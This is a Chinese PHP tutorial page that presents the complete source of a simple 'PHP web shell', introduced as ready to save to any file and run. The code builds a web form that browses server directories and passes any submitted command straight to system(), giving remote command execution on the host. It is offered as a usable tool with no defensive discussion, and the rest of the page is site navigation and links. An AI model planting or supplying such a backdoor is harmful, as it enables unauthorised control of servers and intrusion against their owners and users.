程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
設為首頁 加入收藏
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> PHP基礎知識 >> 簡單的php web shell

簡單的php web shell

編輯:PHP基礎知識
 

一個簡單的php web shell 程序,保存到任意文件後執行

<?php

/*

**************************************************************
* PHP Web Shell *
**************************************************************
*/
?>

<html>
<head>
<title>PHP Web Shell - By freemosue</title>
</head>
<body>
<h1>PHP Web Shell</h1>

<?php
/* 檢測是否設置工作目錄. */
if (isset($work_dir)) {
/* 如果檢測到工作目錄則chdir到該目錄. */
chdir($work_dir);
$work_dir = exec("pwd");
} else {
/* 沒有設置工作目錄 chdir到 $DOCUMENT_ROOT */
chdir($DOCUMENT_ROOT);
$work_dir = $DOCUMENT_ROOT;
}
?>

<form name="myform" action="phpshell.php" method="post">
<p>當前工作目錄: <b><?
$work_dir_splitted = explode("/", substr($work_dir, 1));
/*echo $work_dir_splitted[0] ." ". $work_dir_splitted[1];*/
echo "<a href=\"phpshell.php?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">根目錄</a>/";
if ($work_dir_splitted[0] == "") {
} else {
for ($i = 0; $i < count($work_dir_splitted); $i++) {
/* echo "i = $i";*/
$url .= "/".$work_dir_splitted[$i];
echo "<a href=\"phpshell.php?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/";
}
}
?></b></p>
<p>選擇新工作目錄:</p>
<select name="work_dir" onChange="this.form.submit()">
<?
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* 查找該目錄下所有的文件和子目錄. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ".") {
echo "<option value=\"$work_dir\" selected>當前目錄</option>\n";
} elseif ($dir == "..") {
/* 查找上級目錄. 需要注意的是如果上級目錄為root(/). */
if (strlen($work_dir) == 1) {
} elseif (strrpos($work_dir, "/") == 0) {
echo "<option value=\"/\">上級目錄</option>\n";
} else {
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">上級目錄</option>\n";
}
} else {
if ($work_dir == "/") {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
<p>命令:</p>
<input type="text" name="command" size="60" <? if ($command) { echo "value=\"$command\"";} ?> > <input name="submit_btn" type="submit" value="執行命令"></p>
<p>啟用 <code>stderr</code>-鍵入 ? <input type="checkbox" name="stderr"></p>
<p>輸出:</p>
<textarea cols="80" rows="20" readonly>
<?php
if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
} else {
system($command);
}
}
?>
</textarea>
</form>

<hr>
<i>版權所有 &copy; 2010, <a
href=<a>mailto:</a>[email protected]>freemouse</a>.
</body>
</html>

 
  1. 上一頁:
  2. 下一頁:
PHP基礎知識
LOL數據遠程獲取 實現教程

 最近完成了一個小功能,就是LOL數據
PHP底層工作原理詳解

 先看看下面這個過程: 我們從未
CI框架驗證碼CAPTCHA 輔助函數的使用基礎教程

 使用CAPTCHA 輔助函數很方便生
php命令行用法簡介

 Php是一個非常流行的web服務端腳
phpStudy如何添加多站點功能圖解教程

 服務器環境安裝怎麼裝,用phpstu
Google Open API授權認證體系

 終端用戶在使用第三方軟件訪問用戶受保
相關文章
閱讀排行榜
PHP會話處理相關函數介紹 PHP feof() 函數讀文件的使用基礎教程 PHP最簡單寫文件記日志當前時間 public、protected和 private使用教程 Windows 2008 配置PHP全攻略 一個PHP緩存類 LOL數據遠程獲取 實現教程 php 獲取當前訪問的url文件名的方法小結 PHP 靜態變量或靜態關鍵字stastic 使用詳解教程 nginx: [error] open() “/alidata/server/nginx/logs/nginx.pid” failed 解決辦法 MySQL 時間參數各變量的含義
熱門圖文
具有不同顯示風格的Jbutton 3. Longest Substring Without Repeating Characters,longestrepeating Objective-C基礎筆記(4)Category POJ 1006 使用ASP.NET 顯示事件日誌紀錄 php學習筆記(1),php學習筆記 C++初學者適宜的優秀圖書一覽 .Net設計模式_適配器模式
欄目導航
PHP基礎知識PHP綜合PHP入門知識關於PHP編程
Copyright © 程式師世界 All Rights Reserved